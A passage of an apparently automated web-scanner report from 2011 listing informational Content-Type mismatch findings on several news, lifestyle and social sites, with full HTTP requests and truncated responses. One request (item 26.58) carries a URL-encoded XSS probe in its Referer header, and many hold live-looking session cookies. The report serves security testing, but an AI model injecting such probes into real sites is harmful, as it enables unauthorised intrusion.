Cookie: countrycode=us; neworold=8; sample=10; s_nr=1316282680825; countrycode=us; rsi_segs=; docloc=http://www.delish.com/; __unam=753a475-13278828e41-121285cc-6; __utma=120665501.1463594788.1316281819.1316287865.1316294755.4; __utmb=120665501.1.10.1316294755; __utmc=120665501; __utmz=120665501.1316294755.4.4.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; original_referrer=http://hearst.com/newspapers/metrix4media.php; s_cc=true; s_lastvisit=1316294755393; hm_dslv=Less%20than%201%20day; s_pv=Delish%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=69
Date: Sat, 17 Sep 2011 16:24:45 GMT
Content-Length: 2028
Connection: close

{"statuses_count":1754,"favourites_count":2,"protected":false,"profile_text_color":"333333","profile_image_url":"http:\/\/a0.twimg.com\/profile_images\/487239769\/delish_normal_normal.png","name":"Del
...[SNIP]...
26.44. http://www.delish.com/delish-network-tout.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.delish.com
Path:   /delish-network-tout.json

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /delish-network-tout.json HTTP/1.1
Host: www.delish.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countrycode=us; neworold=8; sample=10; s_nr=1316282680825; countrycode=us; rsi_segs=; docloc=http://www.delish.com/; __unam=753a475-13278828e41-121285cc-6; __utma=120665501.1463594788.1316281819.1316287865.1316294755.4; __utmb=120665501.1.10.1316294755; __utmc=120665501; __utmz=120665501.1316294755.4.4.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; original_referrer=http://hearst.com/newspapers/metrix4media.php; s_cc=true; s_lastvisit=1316294755393; hm_dslv=Less%20than%201%20day; s_pv=Delish%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=374
Date: Sat, 17 Sep 2011 16:29:25 GMT
Content-Length: 3146
Connection: close

{
"site": "Delish",
"sitecode": "DEL",
"article": "442302",
"touttitle": "Delish.com:",
"css": "",
"tabs": [
   {
"title": "Don't Miss These",
"featur
...[SNIP]...
26.45. http://www.delish.com/promo-player-homepage-2011-9-15  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.delish.com
Path:   /promo-player-homepage-2011-9-15

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /promo-player-homepage-2011-9-15 HTTP/1.1
Host: www.delish.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/cm/delish/tmpl_flash/promoplayer/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countrycode=us; neworold=8; sample=10; s_nr=1316282680825; countrycode=us; rsi_segs=; docloc=http://www.delish.com/; __unam=753a475-13278828e41-121285cc-6; __utma=120665501.1463594788.1316281819.1316287865.1316294755.4; __utmb=120665501.1.10.1316294755; __utmc=120665501; __utmz=120665501.1316294755.4.4.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; original_referrer=http://hearst.com/newspapers/metrix4media.php; s_cc=true; s_lastvisit=1316294755393; hm_dslv=Less%20than%201%20day; s_pv=Delish%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=1
Date: Sat, 17 Sep 2011 16:29:37 GMT
Content-Length: 4942
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>
<playerpreferences>
           <templatedata>
               <backgroundimage>images/background.png</backgroundimage>
               <timerIntCount>0<
...[SNIP]...
26.46. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=225566057486878&app_id=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc16d2f5c%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d7fc1bf8%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1045013ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df437aadec%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1045013ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3bf105ff8%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1045013ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2839ee438%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1045013ec&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.76.118
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:22 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
26.47. http://www.kampyle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kampyle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=d80c400aefa6772a0fed91b3600479c4; FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRiZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZSZ1dG1hPTE3NzA2MjIwMC42MDUyMjg0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMSZ1dG12PW51bGw%3D; FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; __utma=114435229.203001032.1316295511.1316295511.1316295511.1; __utmb=114435229.1.10.1316295511; __utmc=114435229; __utmz=114435229.1316295511.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:57:31 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 07:27:10 GMT
ETag: "48a6e-47e-ed5e2f80"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2419200
Expires: Sat, 15 Oct 2011 16:57:31 GMT
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@...................&"T...:
.
..LF..;4..($V...;.....RL..............................QI..HA..!.G.QH..MF.=RH..JC..!.F.WN..............................WM..SI..2.
...[SNIP]...
26.48. http://www.local.com/skins/default/images/locm_transhadow_v001.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.local.com
Path:   /skins/default/images/locm_transhadow_v001.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /skins/default/images/locm_transhadow_v001.jpg HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950; session_start_time=1316294751667; k_visit=1

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/jpeg
Date: Sat, 17 Sep 2011 16:24:40 GMT
ETag: "501b4b10bf6dcc1:0"
Last-Modified: Thu, 08 Sep 2011 00:34:26 GMT
Server: ECD (sjo/52C4)
X-Cache: HIT
X-Powered-By: ASP.NET
Content-Length: 984

.PNG
.
...IHDR.............N..>....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
26.49. http://www.meebo.com/mcmd/events  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.meebo.com
Path:   /mcmd/events

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /mcmd/events?sessionKey=000000000000000000000000aa9dff0ac8a3ChmUyC1w6d48f02b3997f5f7f9ae1363b461&rev=1&clientId=0 HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
Cache-Control: max-age=0
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; meebo-cim-session=26e5cf38356ae41d2e8d; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26borderless_allowed%3Dfalse%26ic19%3D1%26ic16%3D1%26ac12%3D1%26pc1%3D1%26ic9%3D1%26ic1%3D1%26ac15%3D1%26ic8%3D1%26ac7%3D1%26ac6%3D1%26ac4%3D1%26ic20%3D1%26ic7%3D1%26pts_bk%3D1315097366590

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:25:44 GMT
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Cache-Control: no-cache
Content-Length: 21

{"rev":2,"events":[]}
26.50. http://www.meebo.com/mcmd/subscribe  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.meebo.com
Path:   /mcmd/subscribe

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /mcmd/subscribe?sessionKey=000000000000000000000000aa9dff0ac8a3ChmUyC1w6d48f02b3997f5f7f9ae1363b461&type=stream&url=stream%3A%2F%2Fseventeen%2Ffex20huj&clientId=0 HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
Cache-Control: max-age=0
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; meebo-cim-session=26e5cf38356ae41d2e8d; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26borderless_allowed%3Dfalse%26ic19%3D1%26ic16%3D1%26ac12%3D1%26pc1%3D1%26ic9%3D1%26ic1%3D1%26ac15%3D1%26ic8%3D1%26ac7%3D1%26ac6%3D1%26ac4%3D1%26ic20%3D1%26ic7%3D1%26pts_bk%3D1315097366590

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:36:35 GMT
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Cache-Control: no-cache
Content-Length: 57

{"stat":"fail","msg":"Invalid sessionKey","errorcode":11}
26.51. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.misquincemag.com
Path:   /misquincepp-quinceanera-2009-mis-quince-insert

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /misquincepp-quinceanera-2009-mis-quince-insert HTTP/1.1
Host: www.misquincemag.com
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/cm/misquincemag/flash/promoplayer/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; docloc=http://www.misquincemag.com/; __unam=882c0e5-1327948409e-34aa707e-1; __utma=60717745.46403009.1316294817.1316294817.1316294817.1; __utmb=60717745.1.10.1316294817; __utmc=60717745; __utmz=60717745.1316294817.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_cc=true; s_nr=1316294817174; hm_neworold=New; neworold=8; s_lastvisit=1316294817184; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=Mis%20Quince%20Mag%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; rsi_segs=; s_ppv=52

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=600
Date: Sat, 17 Sep 2011 16:40:56 GMT
Content-Length: 6526
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>
<playerpreferences>
   <templatedata>
   <backgroundimage>images/background.png</backgroundimage>
   <timerIntCount>0</timerIntCoun
...[SNIP]...
26.52. http://www.quickandsimple.com/pp-qas-2011-9-7  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.quickandsimple.com
Path:   /pp-qas-2011-9-7

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /pp-qas-2011-9-7 HTTP/1.1
Host: www.quickandsimple.com
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/cm/quickandsimple/flash_tmpl/promoplayer/v01/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; docloc=http://www.quickandsimple.com/; __utma=239537155.514748641.1316294780.1316294780.1316294780.1; __utmb=239537155.1.10.1316294787; __utmc=239537155; __utmz=239537155.1316294787.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_cc=true; s_nr=1316294787226; hm_neworold=New; neworold=8; s_lastvisit=1316294787228; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=Quick%20%26%20Simple%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; rsi_segs=; s_ppv=40

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=553
Date: Sat, 17 Sep 2011 16:39:07 GMT
Content-Length: 5681
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>

<playerpreferences>
           <templatedata>
               <backgroundimage>images/background.png</backgroundimage>
               <timerIntCount>0
...[SNIP]...
26.53. http://www.realage.com/glossary.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.realage.com
Path:   /glossary.json

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /glossary.json HTTP/1.1
Host: www.realage.com
Proxy-Connection: keep-alive
Referer: http://www.realage.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; docloc=http://www.realage.com/; site_id=56; cookieMemQuery=0; dart_c=; dart_d=; dart_a=; s_cc=true; s_nr=1316294773391; hm_neworold=New; neworold=8; s_lastvisit=1316294773507; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=RealAge%3A%20Index; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=1341
Date: Sat, 17 Sep 2011 16:25:15 GMT
Content-Length: 58855
Connection: close

{"absolutely no glutens" : "Some people are able to tolerate certain kinds of gluten protein, such as the kind found in oats. Patients must work with their doctors to determine which dietary glutens c
...[SNIP]...
26.54. http://www.realage.com/promo-player-homepage-2011-03-25  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.realage.com
Path:   /promo-player-homepage-2011-03-25

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /promo-player-homepage-2011-03-25 HTTP/1.1
Host: www.realage.com
Proxy-Connection: keep-alive
Referer: http://www.realage.com/cm/realage/tmpl_flash/promoplayer/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; docloc=http://www.realage.com/; site_id=56; cookieMemQuery=0; dart_c=; dart_d=; dart_a=; s_cc=true; s_nr=1316294773391; hm_neworold=New; neworold=8; s_lastvisit=1316294773507; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=RealAge%3A%20Index; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; rsi_segs=; s_ppv=35

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Vary: Accept-Encoding
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=167
Date: Sat, 17 Sep 2011 16:38:57 GMT
Content-Length: 4817
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>
<playerpreferences>
           <templatedata>
               <backgroundimage>/cm/realage/tmpl_flash/promoplayer/images/background.png</backgroun
...[SNIP]...
26.55. http://www.seattlepi.com/mediaManager/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seattlepi.com
Path:   /mediaManager/

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /mediaManager/?controllerName=image&action=get&id=484616 HTTP/1.1
Host: www.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: btype=web

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Last-Modified: Mon, 20 Dec 2010 22:47:25 GMT
Content-Length: 1031
Content-Type: image/jpeg
Accept-Ranges: bytes
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:28:42 GMT
x-cdn-view: mediamanager cache
Connection: Keep-Alive

GIF89as.... .[......tt....................d..................::m...WW..................v...ff....II.......,,...........................................................................................
...[SNIP]...
26.56. http://www.seventeen.com/api_static/twitter.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seventeen.com
Path:   /api_static/twitter.json

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /api_static/twitter.json HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=bd71dea-132794851b8-57f14eef-1; original_referrer=http://hearst.com/newspapers/metrix4media.php; H1E2=0; GID=322D1C219DF0E6D2F3B1A74078599756; __qca=P0-720415249-1316294783725; nexturl=http%3A%2F%2Fwww.seventeen.com%2F; s_cc=true; s_nr=1316294812370; hm_neworold=New; neworold=8; s_lastvisit=1316294812379; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=Seventeen%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; __utma=136237875.746533379.1316294807.1316294807.1316294807.1; __utmb=136237875.1.10.1316294813; __utmc=136237875; __utmz=136237875.1316294813.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=188
Date: Sat, 17 Sep 2011 16:25:42 GMT
Content-Length: 2204
Connection: close

{"statuses_count":14144,"favourites_count":42,"protected":false,"default_profile":false,"profile_text_color":"333333","profile_image_url":"http:\/\/a3.twimg.com\/profile_images\/1429445687\/771e7eec-7
...[SNIP]...
26.57. http://www.stamfordadvocatedailydeals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stamfordadvocatedailydeals.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.stamfordadvocatedailydeals.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Sat, 17 Sep 2011 16:35:49 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Set-Cookie: JSESSIONID=37103177E2916000C11FCE6C9EEDE52E.webserver4; Path=/
Set-Cookie: publisher=4dd2c8e1674abc91a59b2f06; Expires=Mon, 17-Oct-2011 16:46:40 GMT; Path=/
Set-Cookie: division=4dd2c8e1674abc91a39b2f06; Expires=Sun, 16-Sep-2012 16:46:40 GMT; Path=/
Set-Cookie: visitor=4e74cef01d535a807a8643a6; Expires=Sun, 16-Sep-2012 16:46:40 GMT; Path=/
Content-Length: 27

division found: favicon.ico
26.58. http://www.stamfordadvocatedailydeals.com/widgets/a  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stamfordadvocatedailydeals.com
Path:   /widgets/a

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /widgets/a HTTP/1.1
Host: www.stamfordadvocatedailydeals.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocatedailydeals.com/widgets/widgetc8b07%3Cimg%20src%3da%20onerror%3dalert(%22XSS%22)%3Ebe39df5f2e2

Response

HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Sat, 17 Sep 2011 16:35:45 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 30

Could not find the template: a
26.59. http://www.thedailygreen.com/api_static/twitter.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thedailygreen.com
Path:   /api_static/twitter.json

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /api_static/twitter.json HTTP/1.1
Host: www.thedailygreen.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
